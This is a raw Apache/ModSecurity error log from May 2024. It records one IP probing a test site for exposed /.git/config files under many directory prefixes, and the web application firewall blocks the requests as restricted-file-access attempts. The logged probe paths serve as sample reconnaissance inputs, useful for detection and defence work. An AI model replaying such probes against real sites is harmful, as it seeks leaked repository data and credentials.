[Wed May 22 09:56:53.706580 2024] [:error] [pid 3395360] [client 91.215.85.43:36968] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /api/v4/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIAAAAAM"]
[Wed May 22 09:56:53.707067 2024] [:error] [pid 3395360] [client 91.215.85.43:36968] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIAAAAAM"]
[Wed May 22 09:56:53.707410 2024] [:error] [pid 3395360] [client 91.215.85.43:36968] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/v4/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIAAAAAM"]
[Wed May 22 09:56:53.708080 2024] [:error] [pid 3395357] [client 91.215.85.43:37208] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /gateway/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCgAAAAA"]
[Wed May 22 09:56:53.708402 2024] [:error] [pid 3395357] [client 91.215.85.43:37208] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCgAAAAA"]
[Wed May 22 09:56:53.708666 2024] [:error] [pid 3395357] [client 91.215.85.43:37208] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/gateway/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCgAAAAA"]
[Wed May 22 09:56:53.710572 2024] [:error] [pid 3395359] [client 91.215.85.43:37040] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /application/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQwAAAAI"]
[Wed May 22 09:56:53.710889 2024] [:error] [pid 3395359] [client 91.215.85.43:37040] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQwAAAAI"]
[Wed May 22 09:56:53.711115 2024] [authz_core:error] [pid 3395395] [client 91.215.85.43:37006] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.git
[Wed May 22 09:56:53.711123 2024] [:error] [pid 3395359] [client 91.215.85.43:37040] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpQwAAAAI"]
[Wed May 22 09:56:53.712140 2024] [:error] [pid 3395392] [client 91.215.85.43:37068] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/demo/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzgAAAAY"]
[Wed May 22 09:56:53.712466 2024] [:error] [pid 3395358] [client 91.215.85.43:37128] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /new/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HAAAAAE"]
[Wed May 22 09:56:53.712889 2024] [:error] [pid 3395358] [client 91.215.85.43:37128] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HAAAAAE"]
[Wed May 22 09:56:53.713175 2024] [:error] [pid 3395358] [client 91.215.85.43:37128] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/new/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HAAAAAE"]
[Wed May 22 09:56:53.797831 2024] [:error] [pid 3395384] [client 91.215.85.43:37158] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repository/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LQAAAAU"]
[Wed May 22 09:56:53.798371 2024] [:error] [pid 3395384] [client 91.215.85.43:37158] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LQAAAAU"]
[Wed May 22 09:56:53.798774 2024] [:error] [pid 3395384] [client 91.215.85.43:37158] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repository/.git/config"] [unique_id "Zk2lRWo8EkGRap188Sa_LQAAAAU"]
[Wed May 22 09:56:53.802426 2024] [:error] [pid 3395396] [client 91.215.85.43:37174] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /samples/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XwAAAAo"]
[Wed May 22 09:56:53.805441 2024] [:error] [pid 3395394] [client 91.215.85.43:37116] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /__macosx/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32egAAAAg"]
[Wed May 22 09:56:53.805713 2024] [:error] [pid 3395394] [client 91.215.85.43:37116] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32egAAAAg"]
[Wed May 22 09:56:53.805956 2024] [:error] [pid 3395394] [client 91.215.85.43:37116] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/__MACOSX/.git/config"] [unique_id "Zk2lRRy_kxE0Cryukh32egAAAAg"]
[Wed May 22 09:56:53.807927 2024] [:error] [pid 3395392] [client 91.215.85.43:37214] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzwAAAAY"]
[Wed May 22 09:56:53.808156 2024] [:error] [pid 3395392] [client 91.215.85.43:37214] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzwAAAAY"]
[Wed May 22 09:56:53.808326 2024] [:error] [pid 3395392] [client 91.215.85.43:37214] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/data/.git/config"] [unique_id "Zk2lRYxthpOCBUxc2u8ZzwAAAAY"]
[Wed May 22 09:56:53.808726 2024] [:error] [pid 3395360] [client 91.215.85.43:37144] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /node_modules/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIQAAAAM"]
[Wed May 22 09:56:53.809393 2024] [:error] [pid 3395360] [client 91.215.85.43:37144] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIQAAAAM"]
[Wed May 22 09:56:53.809856 2024] [:error] [pid 3395357] [client 91.215.85.43:36962] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /backup/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCwAAAAA"]
[Wed May 22 09:56:53.809883 2024] [:error] [pid 3395360] [client 91.215.85.43:37144] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/node_modules/.git/config"] [unique_id "Zk2lRVQmnWT4N4NxlYdmIQAAAAM"]
[Wed May 22 09:56:53.810077 2024] [:error] [pid 3395357] [client 91.215.85.43:36962] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCwAAAAA"]
[Wed May 22 09:56:53.810240 2024] [:error] [pid 3395357] [client 91.215.85.43:36962] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup/.git/config"] [unique_id "Zk2lRSC0SfZuqf1hbVzvCwAAAAA"]
[Wed May 22 09:56:53.812102 2024] [:error] [pid 3395396] [client 91.215.85.43:37174] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XwAAAAo"]
[Wed May 22 09:56:53.812258 2024] [:error] [pid 3395396] [client 91.215.85.43:37174] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/samples/.git/config"] [unique_id "Zk2lRedio4tMHzszuH-1XwAAAAo"]
[Wed May 22 09:56:53.813758 2024] [:error] [pid 3395359] [client 91.215.85.43:37192] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /repos/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRAAAAAI"]
[Wed May 22 09:56:53.813971 2024] [:error] [pid 3395359] [client 91.215.85.43:37192] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRAAAAAI"]
[Wed May 22 09:56:53.814131 2024] [:error] [pid 3395359] [client 91.215.85.43:37192] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/repos/.git/config"] [unique_id "Zk2lRZTMfOoR75vS6_DpRAAAAAI"]
[Wed May 22 09:56:53.815860 2024] [:error] [pid 3395395] [client 91.215.85.43:37082] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5tQAAAAk"]
[Wed May 22 09:56:53.816093 2024] [:error] [pid 3395395] [client 91.215.85.43:37082] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5tQAAAAk"]
[Wed May 22 09:56:53.816251 2024] [:error] [pid 3395395] [client 91.215.85.43:37082] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/git/.git/config"] [unique_id "Zk2lRQYtOgQFTVNZreu5tQAAAAk"]
[Wed May 22 09:56:53.817197 2024] [:error] [pid 3395358] [client 91.215.85.43:37106] [client 91.215.85.43] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /m/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HQAAAAE"]
[Wed May 22 09:56:53.817349 2024] [:error] [pid 3395358] [client 91.215.85.43:37106] [client 91.215.85.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HQAAAAE"]
[Wed May 22 09:56:53.817514 2024] [:error] [pid 3395358] [client 91.215.85.43:37106] [client 91.215.85.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/m/.git/config"] [unique_id "Zk2lRcLR5UJ49OezHSs-HQAAAAE"]
